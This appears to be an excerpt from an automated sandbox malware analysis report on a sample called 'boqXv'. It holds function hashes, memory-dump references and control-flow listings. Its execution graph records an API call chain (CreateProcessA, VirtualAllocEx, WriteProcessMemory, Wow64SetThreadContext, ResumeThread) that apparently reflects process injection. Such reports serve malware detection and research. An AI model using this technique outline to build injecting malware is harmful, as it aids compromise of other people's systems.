                                                • Opcode Fuzzy Hash: dfbe366f74cd69343f471aa663c140dfd560073652fdc40c493622dbe12df9e1
                                                • Instruction Fuzzy Hash: 422193347201025FDF11DB2CF888B997769FB49354F148A60E409CB265EB38EC898BD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03274FD0 Relevance: .1, Instructions: 68COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 133bed908b890b215e72d4da212dbf324ac3c7bf26f43810acf6eaf5212f7c78
                                                • Instruction ID: 34518de9312a5865a4cc838f6516e797f05b82ab3bd2f828e7f8bd2cb184fea9
                                                • Opcode Fuzzy Hash: 133bed908b890b215e72d4da212dbf324ac3c7bf26f43810acf6eaf5212f7c78
                                                • Instruction Fuzzy Hash: 4621E534710205CFDB54EB78D558AADB7F6BF8D305B2004A8E506EB3A5EB369D40CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03276FA8 Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0bb669629405597ad31b9c941541f455a4b463910216bd6dcc13c6ecfa9446d
                                                • Instruction ID: 0a67d4be2b0dc0fbb93218bacb2793948ac5169355436068f417a95dc2526d24
                                                • Opcode Fuzzy Hash: a0bb669629405597ad31b9c941541f455a4b463910216bd6dcc13c6ecfa9446d
                                                • Instruction Fuzzy Hash: 8311E330F102059FDB10EAB9984476EBBE5FB84314F2485B6E51ACB281EB75C8968793
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032714C0 Relevance: .1, Instructions: 64COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0925d0340a8a4960d5a1d19b4db3c30dabb842c56b79698859b361d924a24307
                                                • Instruction ID: 4be170c913005b6328dc83526e93d0f2d3dec38732133786e034b7d128a2a764
                                                • Opcode Fuzzy Hash: 0925d0340a8a4960d5a1d19b4db3c30dabb842c56b79698859b361d924a24307
                                                • Instruction Fuzzy Hash: CD11C831A103169FCF25DF7988506AEBBF5FF49150B1844B9EC05EB340EB31E59687A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 018ED006 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1898512408.00000000018ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 018ED000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_18ed000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6b85d6b0b833d50871f4a072741f3cc52e56fb3a005152f13c2f31d9db928960
                                                • Instruction ID: d8ef2c2a4a002b3061e62562506d7a96f616a645bf1a825ea6c6c040094bad56
                                                • Opcode Fuzzy Hash: 6b85d6b0b833d50871f4a072741f3cc52e56fb3a005152f13c2f31d9db928960
                                                • Instruction Fuzzy Hash: A82153755083809FDB02CF54D994711BFB1EB46314F28C5DAD8498F2A7C33A995ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03270848 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d28928fb0a9eb1701fdf020da4d40e44c7c0b0cd67649f264a3bca8a27b3b2d0
                                                • Instruction ID: 20d31fcc659bcf2705dfe937a9d119378c43b84ce695f981877a7fda89471f87
                                                • Opcode Fuzzy Hash: d28928fb0a9eb1701fdf020da4d40e44c7c0b0cd67649f264a3bca8a27b3b2d0
                                                • Instruction Fuzzy Hash: B511BF30B202068FDF20EA78E44432A72A9FB46310F24C9B9E406DB341DA75DCC98BC1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032717F8 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4bb3a975104245fa89579f3e47cf2adddc1bdddc5870816dc0eab6832bffaec
                                                • Instruction ID: 32cae93e2850e21136f140bfa24a6ed09e3e51b690dfbe8d83bdd27a196cf784
                                                • Opcode Fuzzy Hash: f4bb3a975104245fa89579f3e47cf2adddc1bdddc5870816dc0eab6832bffaec
                                                • Instruction Fuzzy Hash: 0F11E072B10311ABDB119E78A80DA5FBEB6FB48620B148565E809D3341EA39D85287E2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 032714D0 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 791319dc28250f763438fdc6cc08da6613309eebd71f16fe211229bfa91942c9
                                                • Instruction ID: d1f678daa6937afb8648157316097c26d611dcff6bfa26989761718af6aa6ff5
                                                • Opcode Fuzzy Hash: 791319dc28250f763438fdc6cc08da6613309eebd71f16fe211229bfa91942c9
                                                • Instruction Fuzzy Hash: EB015635A103158FCF25EFB9845059EB7F5FF48250B1444B9D805EB300EB75D9968BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03279C08 Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c75a7be0be866e75942ec7aff93f05d38ae442962037be7432be0c20892867dc
                                                • Instruction ID: dfc2820bb59d102d10c88752c8c7c1b1f56278f73a9061d27f2ca94d90853c81
                                                • Opcode Fuzzy Hash: c75a7be0be866e75942ec7aff93f05d38ae442962037be7432be0c20892867dc
                                                • Instruction Fuzzy Hash: 4201B530A102058FCB04EFA9D98478ABBA6FF85310F54C674D8085F39ADB70E985C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03278469 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1193036e18275a64cd3da8b3efcac3df55c00cdfad73878577ab97b30f783694
                                                • Instruction ID: bb0b9c4d75dc6c780c0321a3332ff6ac09e40bebfcc80dbfde8c78e6a3284d85
                                                • Opcode Fuzzy Hash: 1193036e18275a64cd3da8b3efcac3df55c00cdfad73878577ab97b30f783694
                                                • Instruction Fuzzy Hash: 8601F97064024AAFCB05EBBCF98599CBFB1EB41304B1442F9C8049B255EF355E4AC782
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0327155C Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4def1e64b161ece73408d517944100e090e1e5d1aa70d0d1e59e505cdbb31e67
                                                • Instruction ID: 09eeafe884195715aedebb4e7e073ebd2a2341c6e9a91c718c85e00f6ed71ac9
                                                • Opcode Fuzzy Hash: 4def1e64b161ece73408d517944100e090e1e5d1aa70d0d1e59e505cdbb31e67
                                                • Instruction Fuzzy Hash: A8F0F637A142508FDB26CBA884901ACBBB1FE5429175940E6D807EF711D770E4D6C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03277408 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e6864fcb77369f2bdc05b43d35edad4d346a156bd2db570824ea22f5ffa5ca4
                                                • Instruction ID: 5ca426bf6d6e3b0710e2f6a3d6e80498169b5b80d8cecd92c8c03f91353fe50b
                                                • Opcode Fuzzy Hash: 2e6864fcb77369f2bdc05b43d35edad4d346a156bd2db570824ea22f5ffa5ca4
                                                • Instruction Fuzzy Hash: 6EF0C435B10218CFC714DB74D5A8B6D77B2EF88765F1440A8E5069B3A0CF35AD42DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03278478 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ab9855d02ef83edccfab00d985a37a26cec5cf7e4184d40ff7dbe385795923a
                                                • Instruction ID: d77fe0913ffa6c41b9eb1f7de66b7bc351d61d36fd3935205caeb9ea57d22be3
                                                • Opcode Fuzzy Hash: 1ab9855d02ef83edccfab00d985a37a26cec5cf7e4184d40ff7dbe385795923a
                                                • Instruction Fuzzy Hash: FCF0F470A4020AEFCB04EBACF98499DBBB5EB44304F508678C90597254DF356E45CBD2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03276F73 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c78cfc189d8e6bc417df187d2171a2135fce8b52d9622b0bb81835328d340ad1
                                                • Instruction ID: 89706a7d5c126aa25c07c7b124615aebc17adc7bc9f623313df40922cb402629
                                                • Opcode Fuzzy Hash: c78cfc189d8e6bc417df187d2171a2135fce8b52d9622b0bb81835328d340ad1
                                                • Instruction Fuzzy Hash: BDC0123A3181908F8A02E728E0644B837B1EBCA16932400AAE148CF322CE22A802CB00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03276C3C Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.1902515064.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3270000_boqXv.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 600e5aa2a9e667826730cf1907dfe4cc76ca8c52e1d4ce9549b1df760e50ac95
                                                • Instruction ID: fb58d430dd09bd736b857c0bfcd0d302910fac3a83d479653acf304b6106de0f
                                                • Opcode Fuzzy Hash: 600e5aa2a9e667826730cf1907dfe4cc76ca8c52e1d4ce9549b1df760e50ac95
                                                • Instruction Fuzzy Hash: A6C0123A3181508F8602A728E0644BC37B1EBCA62936400AAE148CF322CE229802CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:179
                                                Total number of Limit Nodes:19
                                                execution_graph 22383 7b8af08 22384 7b8b093 22383->22384 22386 7b8af2e 22383->22386 22386->22384 22387 7b87cd0 22386->22387 22388 7b8b188 PostMessageW 22387->22388 22389 7b8b1f4 22388->22389 22389->22386 22212 25bd098 22213 25bd0de GetCurrentProcess 22212->22213 22215 25bd129 22213->22215 22216 25bd130 GetCurrentThread 22213->22216 22215->22216 22217 25bd16d GetCurrentProcess 22216->22217 22218 25bd166 22216->22218 22220 25bd1a3 22217->22220 22218->22217 22219 25bd1cb GetCurrentThreadId 22221 25bd1fc 22219->22221 22220->22219 22390 25b4668 22391 25b4672 22390->22391 22393 25b4759 22390->22393 22394 25b477d 22393->22394 22398 25b4858 22394->22398 22402 25b4868 22394->22402 22400 25b4868 22398->22400 22399 25b496c 22399->22399 22400->22399 22406 25b44b0 22400->22406 22404 25b488f 22402->22404 22403 25b496c 22403->22403 22404->22403 22405 25b44b0 CreateActCtxA 22404->22405 22405->22403 22407 25b58f8 CreateActCtxA 22406->22407 22409 25b59bb 22407->22409 22410 25bac08 22411 25bac17 22410->22411 22414 25bacef 22410->22414 22422 25bad00 22410->22422 22415 25bad11 22414->22415 22416 25bad34 22414->22416 22415->22416 22430 25bb398 22415->22430 22434 25bb388 22415->22434 22416->22411 22417 25bad2c 22417->22416 22418 25baf38 GetModuleHandleW 22417->22418 22419 25baf65 22418->22419 22419->22411 22423 25bad11 22422->22423 22424 25bad34 22422->22424 22423->22424 22428 25bb398 LoadLibraryExW 22423->22428 22429 25bb388 LoadLibraryExW 22423->22429 22424->22411 22425 25baf38 GetModuleHandleW 22427 25baf65 22425->22427 22426 25bad2c 22426->22424 22426->22425 22427->22411 22428->22426 22429->22426 22431 25bb3ac 22430->22431 22433 25bb3d1 22431->22433 22438 25baf88 22431->22438 22433->22417 22435 25bb398 22434->22435 22436 25baf88 LoadLibraryExW 22435->22436 22437 25bb3d1 22435->22437 22436->22437 22437->22417 22439 25bb558 LoadLibraryExW 22438->22439 22441 25bb5d1 22439->22441 22441->22433 22442 25bd3a1 22443 25bd367 DuplicateHandle 22442->22443 22445 25bd3aa 22442->22445 22444 25bd376 22443->22444 22222 7b884b5 22226 7b89d28 22222->22226 22243 7b89d19 22222->22243 22223 7b884c4 22228 7b89d42 22226->22228 22227 7b89d66 22227->22223 22260 7b8a3ee 22228->22260 22268 7b8abec 22228->22268 22272 7b8a36b 22228->22272 22277 7b8a209 22228->22277 22283 7b8a489 22228->22283 22288 7b8a3a9 22228->22288 22292 7b8a814 22228->22292 22297 7b8a2d3 22228->22297 22302 7b8a050 22228->22302 22308 7b8a9f0 22228->22308 22314 7b8a49c 22228->22314 22319 7b8a29b 22228->22319 22324 7b8a881 22228->22324 22329 7b8a040 22228->22329 22244 7b89d28 22243->22244 22246 7b8a29b 2 API calls 22244->22246 22247 7b8a49c 2 API calls 22244->22247 22248 7b8a9f0 2 API calls 22244->22248 22249 7b8a050 2 API calls 22244->22249 22250 7b8a2d3 2 API calls 22244->22250 22251 7b8a814 2 API calls 22244->22251 22252 7b8a3a9 2 API calls 22244->22252 22253 7b8a489 2 API calls 22244->22253 22254 7b8a209 2 API calls 22244->22254 22255 7b8a36b 2 API calls 22244->22255 22256 7b8abec 2 API calls 22244->22256 22257 7b8a3ee 4 API calls 22244->22257 22258 7b8a040 2 API calls 22244->22258 22259 7b8a881 2 API calls 22244->22259 22245 7b89d66 22245->22223 22246->22245 22247->22245 22248->22245 22249->22245 22250->22245 22251->22245 22252->22245 22253->22245 22254->22245 22255->22245 22256->22245 22257->22245 22258->22245 22259->22245 22335 7b87808 22260->22335 22339 7b87800 22260->22339 22261 7b8a2fb 22262 7b8a87b 22261->22262 22343 7b8731a 22261->22343 22347 7b87320 22261->22347 22263 7b8a55f 22351 7b8799a 22268->22351 22355 7b879a0 22268->22355 22269 7b8ac13 22273 7b8a2dd 22272->22273 22273->22227 22274 7b8a8a9 22273->22274 22275 7b87808 Wow64SetThreadContext 22273->22275 22276 7b87800 Wow64SetThreadContext 22273->22276 22274->22274 22275->22273 22276->22273 22279 7b8a0e2 22277->22279 22278 7b8a142 22278->22227 22279->22278 22359 7b88028 22279->22359 22363 7b8801d 22279->22363 22284 7b8a496 22283->22284 22286 7b8731a ResumeThread 22284->22286 22287 7b87320 ResumeThread 22284->22287 22285 7b8a55f 22286->22285 22287->22285 22367 7b87a88 22288->22367 22371 7b87a90 22288->22371 22289 7b8a278 22289->22227 22293 7b8a81a 22292->22293 22295 7b8799a WriteProcessMemory 22293->22295 22296 7b879a0 WriteProcessMemory 22293->22296 22294 7b8a337 22295->22294 22296->22294 22298 7b8a2ea 22297->22298 22300 7b8731a ResumeThread 22298->22300 22301 7b87320 ResumeThread 22298->22301 22299 7b8a55f 22300->22299 22301->22299 22304 7b8a083 22302->22304 22303 7b8a142 22303->22227 22304->22303 22306 7b88028 CreateProcessA 22304->22306 22307 7b8801d CreateProcessA 22304->22307 22305 7b8a250 22305->22227 22306->22305 22307->22305 22309 7b8a82b 22308->22309 22310 7b8abcd 22309->22310 22312 7b8799a WriteProcessMemory 22309->22312 22313 7b879a0 WriteProcessMemory 22309->22313 22310->22227 22311 7b8a337 22312->22311 22313->22311 22315 7b8a4bf 22314->22315 22317 7b8799a WriteProcessMemory 22315->22317 22318 7b879a0 WriteProcessMemory 22315->22318 22316 7b8a71d 22316->22227 22317->22316 22318->22316 22320 7b8a2dd 22319->22320 22320->22227 22321 7b8a8a9 22320->22321 22322 7b87808 Wow64SetThreadContext 22320->22322 22323 7b87800 Wow64SetThreadContext 22320->22323 22321->22321 22322->22320 22323->22320 22325 7b8a94a 22324->22325 22375 7b878da 22325->22375 22379 7b878e0 22325->22379 22326 7b8a96b 22331 7b8a083 22329->22331 22330 7b8a142 22330->22227 22331->22330 22333 7b88028 CreateProcessA 22331->22333 22334 7b8801d CreateProcessA 22331->22334 22332 7b8a250 22332->22227 22333->22332 22334->22332 22336 7b8784d Wow64SetThreadContext 22335->22336 22338 7b87895 22336->22338 22338->22261 22340 7b87808 Wow64SetThreadContext 22339->22340 22342 7b87895 22340->22342 22342->22261 22344 7b87320 ResumeThread 22343->22344 22346 7b87391 22344->22346 22346->22263 22348 7b87360 ResumeThread 22347->22348 22350 7b87391 22348->22350 22350->22263 22352 7b879a0 WriteProcessMemory 22351->22352 22354 7b87a3f 22352->22354 22354->22269 22356 7b879e8 WriteProcessMemory 22355->22356 22358 7b87a3f 22356->22358 22358->22269 22360 7b880b1 CreateProcessA 22359->22360 22362 7b88273 22360->22362 22364 7b88028 CreateProcessA 22363->22364 22366 7b88273 22364->22366 22368 7b87a90 ReadProcessMemory 22367->22368 22370 7b87b1f 22368->22370 22370->22289 22372 7b87adb ReadProcessMemory 22371->22372 22374 7b87b1f 22372->22374 22374->22289 22376 7b878e0 VirtualAllocEx 22375->22376 22378 7b8795d 22376->22378 22378->22326 22380 7b87920 VirtualAllocEx 22379->22380 22382 7b8795d 22380->22382 22382->22326

                                                Executed Functions

                                                Function 025BD088 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 294 25bd088-25bd127 GetCurrentProcess 298 25bd129-25bd12f 294->298 299 25bd130-25bd164 GetCurrentThread 294->299 298->299 300 25bd16d-25bd1a1 GetCurrentProcess 299->300 301 25bd166-25bd16c 299->301 303 25bd1aa-25bd1c5 call 25bd268 300->303 304 25bd1a3-25bd1a9 300->304 301->300 306 25bd1cb-25bd1fa GetCurrentThreadId 303->306 304->303 308 25bd1fc-25bd202 306->308 309 25bd203-25bd265 306->309 308->309
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 025BD116
                                                • GetCurrentThread.KERNEL32 ref: 025BD153
                                                • GetCurrentProcess.KERNEL32 ref: 025BD190
                                                • GetCurrentThreadId.KERNEL32 ref: 025BD1E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID: 89x
                                                • API String ID: 2063062207-2237864334
                                                • Opcode ID: 3fabff09f8414cb40749afe656134beac19f75f64063146903206ea0e76d9090
                                                • Instruction ID: 964475359185213e67e96060a029fd5dfc5a68867e0e81f4c1a33a6e20515d27
                                                • Opcode Fuzzy Hash: 3fabff09f8414cb40749afe656134beac19f75f64063146903206ea0e76d9090
                                                • Instruction Fuzzy Hash: 475166B09016098FDB15DFAAD548BDEBBF1FF48314F208069E419A7360D774A984CF6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025BD098 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 316 25bd098-25bd127 GetCurrentProcess 320 25bd129-25bd12f 316->320 321 25bd130-25bd164 GetCurrentThread 316->321 320->321 322 25bd16d-25bd1a1 GetCurrentProcess 321->322 323 25bd166-25bd16c 321->323 325 25bd1aa-25bd1c5 call 25bd268 322->325 326 25bd1a3-25bd1a9 322->326 323->322 328 25bd1cb-25bd1fa GetCurrentThreadId 325->328 326->325 330 25bd1fc-25bd202 328->330 331 25bd203-25bd265 328->331 330->331
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 025BD116
                                                • GetCurrentThread.KERNEL32 ref: 025BD153
                                                • GetCurrentProcess.KERNEL32 ref: 025BD190
                                                • GetCurrentThreadId.KERNEL32 ref: 025BD1E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1900239879.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_25b0000_boqXv.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID: 89x
                                                • API String ID: 2063062207-2237864334
                                                • Opcode ID: cba859d33574e8c0e6060b20140ae3fee06181df9d6cc8f3de953997e1be1dfc
                                                • Instruction ID: 193a23cf7102f7ef2d725918550aa0086f5a15e985451a40765f2f616ba46ef1
                                                • Opcode Fuzzy Hash: cba859d33574e8c0e6060b20140ae3fee06181df9d6cc8f3de953997e1be1dfc
                                                • Instruction Fuzzy Hash: 325165B09016098FDB04DFAAD948BDEBBF1FF48314F208059E419A7360D734A984CF6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B8801D Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 526 7b8801d-7b880bd 529 7b880bf-7b880c9 526->529 530 7b880f6-7b88116 526->530 529->530 531 7b880cb-7b880cd 529->531 535 7b88118-7b88122 530->535 536 7b8814f-7b8817e 530->536 533 7b880cf-7b880d9 531->533 534 7b880f0-7b880f3 531->534 537 7b880db 533->537 538 7b880dd-7b880ec 533->538 534->530 535->536 539 7b88124-7b88126 535->539 546 7b88180-7b8818a 536->546 547 7b881b7-7b88271 CreateProcessA 536->547 537->538 538->538 540 7b880ee 538->540 541 7b88128-7b88132 539->541 542 7b88149-7b8814c 539->542 540->534 544 7b88134 541->544 545 7b88136-7b88145 541->545 542->536 544->545 545->545 548 7b88147 545->548 546->547 549 7b8818c-7b8818e 546->549 558 7b8827a-7b88300 547->558 559 7b88273-7b88279 547->559 548->542 551 7b88190-7b8819a 549->551 552 7b881b1-7b881b4 549->552 553 7b8819c 551->553 554 7b8819e-7b881ad 551->554 552->547 553->554 554->554 555 7b881af 554->555 555->552 569 7b88310-7b88314 558->569 570 7b88302-7b88306 558->570 559->558 572 7b88324-7b88328 569->572 573 7b88316-7b8831a 569->573 570->569 571 7b88308 570->571 571->569 574 7b88338-7b8833c 572->574 575 7b8832a-7b8832e 572->575 573->572 576 7b8831c 573->576 578 7b8834e-7b88355 574->578 579 7b8833e-7b88344 574->579 575->574 577 7b88330 575->577 576->572 577->574 580 7b8836c 578->580 581 7b88357-7b88366 578->581 579->578 583 7b8836d 580->583 581->580 583->583
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B8825E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: adf9656f05c2a084725bb3fa6146393ccd0828a053b78dd68de548e91efbfeae
                                                • Instruction ID: c82eb732caacb19a06303023010f8d5855cbcd0892899c0169f0bebe315fed33
                                                • Opcode Fuzzy Hash: adf9656f05c2a084725bb3fa6146393ccd0828a053b78dd68de548e91efbfeae
                                                • Instruction Fuzzy Hash: E0A17DB1D1021ADFEB60DF68C840BDDBBB2FF48314F5481A9E858A7290DB749985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 07B88028 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 584 7b88028-7b880bd 586 7b880bf-7b880c9 584->586 587 7b880f6-7b88116 584->587 586->587 588 7b880cb-7b880cd 586->588 592 7b88118-7b88122 587->592 593 7b8814f-7b8817e 587->593 590 7b880cf-7b880d9 588->590 591 7b880f0-7b880f3 588->591 594 7b880db 590->594 595 7b880dd-7b880ec 590->595 591->587 592->593 596 7b88124-7b88126 592->596 603 7b88180-7b8818a 593->603 604 7b881b7-7b88271 CreateProcessA 593->604 594->595 595->595 597 7b880ee 595->597 598 7b88128-7b88132 596->598 599 7b88149-7b8814c 596->599 597->591 601 7b88134 598->601 602 7b88136-7b88145 598->602 599->593 601->602 602->602 605 7b88147 602->605 603->604 606 7b8818c-7b8818e 603->606 615 7b8827a-7b88300 604->615 616 7b88273-7b88279 604->616 605->599 608 7b88190-7b8819a 606->608 609 7b881b1-7b881b4 606->609 610 7b8819c 608->610 611 7b8819e-7b881ad 608->611 609->604 610->611 611->611 612 7b881af 611->612 612->609 626 7b88310-7b88314 615->626 627 7b88302-7b88306 615->627 616->615 629 7b88324-7b88328 626->629 630 7b88316-7b8831a 626->630 627->626 628 7b88308 627->628 628->626 631 7b88338-7b8833c 629->631 632 7b8832a-7b8832e 629->632 630->629 633 7b8831c 630->633 635 7b8834e-7b88355 631->635 636 7b8833e-7b88344 631->636 632->631 634 7b88330 632->634 633->629 634->631 637 7b8836c 635->637 638 7b88357-7b88366 635->638 636->635 640 7b8836d 637->640 638->637 640->640
                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B8825E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1923499263.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7b80000_boqXv.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 7b99ddc4a5ed08af6522f5a8fa6ad08ff8724258eb0b208c7fc1a9c66704511c
                                                • Instruction ID: 4a4f1bc10a5040e1912a7263b8e4223c073553dd3f2cad91d836db1015910cc1
                                                • Opcode Fuzzy Hash: 7b99ddc4a5ed08af6522f5a8fa6ad08ff8724258eb0b208c7fc1a9c66704511c
                                                • Instruction Fuzzy Hash: 11916EB1D1021ACFEB64DF68C840BDDBBB2FF48310F5481A9E818A7290DB749985CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025BAD00 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
